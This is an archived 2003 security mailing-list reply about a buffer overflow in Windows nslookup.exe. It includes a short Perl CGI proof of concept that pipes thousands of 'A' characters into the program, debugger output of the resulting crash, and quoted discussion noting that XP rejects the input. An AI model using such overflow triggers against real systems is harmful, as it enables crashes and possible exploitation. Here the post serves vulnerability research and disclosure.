Vulnerability Development mailing list archives
Re: NSLOOKUP.EXE
From: Ryan Yagatich <ryany () pantek com>
Date: Fri, 21 Mar 2003 12:04:49 -0500 (EST)
==begin silly.cgi #!perl -w use strict; print "Content-type: text/html\n\n"; open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)"; print NSLOOKUP "A" x 6489; close(NSLOOKUP); ==end silly.cgi MSDE: Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access violation writing location 0x0103e000. 01004D5D cmp esi,100F770h 01004D63 je 01004D6F ---> 01004D65 mov dword ptr [edi],esi 01004D67 add edi,4 01004D6A jmp 01004C37 01004D65 = 16797029 ,_____________________________________________________, \ Ryan Yagatich support () pantek com \ / Pantek Incorporated (877) LINUX-FIX / \ http://www.pantek.com/security (440) 519-1802 \ / Are your networks secure? Are you certain? / \___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\ On Thu, 20 Mar 2003, Blue Boar wrote:
Patrick Webster wrote:Can you do anything interesting with this?: C:\>nslookup Default Server: dns.server.net Address: 111.222.333.444AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Gives error: memory can't be "read" - 0x414141 (aka A).If you have to manually type all the A's, then probably not. Maybe if someone did something silly like make a CGI script that calls nslookup.exe directly with user input. What OS are you testing on? It looks like it's fixed in XP: C:\winxp\system32>nslookup Default Server: dns1.snfcca.sbcglobal.net Address: 206.13.28.12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *** Input is too longBB
Current thread:
- NSLOOKUP.EXE Patrick Webster (Mar 20)
- Re: NSLOOKUP.EXE Blue Boar (Mar 20)
- RE: NSLOOKUP.EXE Brett Moore (Mar 21)
- Re: NSLOOKUP.EXE Ryan Yagatich (Mar 21)
- Re: NSLOOKUP.EXE K. K. Mookhey (Mar 23)
- RE: NSLOOKUP.EXE Brett Moore (Mar 23)
- Re: NSLOOKUP.EXE Marcos D. Marado Torres (Mar 24)
- <Possible follow-ups>
- RE: NSLOOKUP.EXE Patrick Webster (Mar 20)
- RES: NSLOOKUP.EXE Cleber P. de Souza (Mar 21)
- Re: NSLOOKUP.EXE Nexus (Mar 21)
- RE: NSLOOKUP.EXE Sillari Andrea (Mar 21)
- Re: NSLOOKUP.EXE Filip Maertens (Mar 21)
- Re: NSLOOKUP.EXE Chris Calabrese (Mar 21)
- Re: NSLOOKUP.EXE Mysq (Mar 21)
- Re: NSLOOKUP.EXE Blue Boar (Mar 20)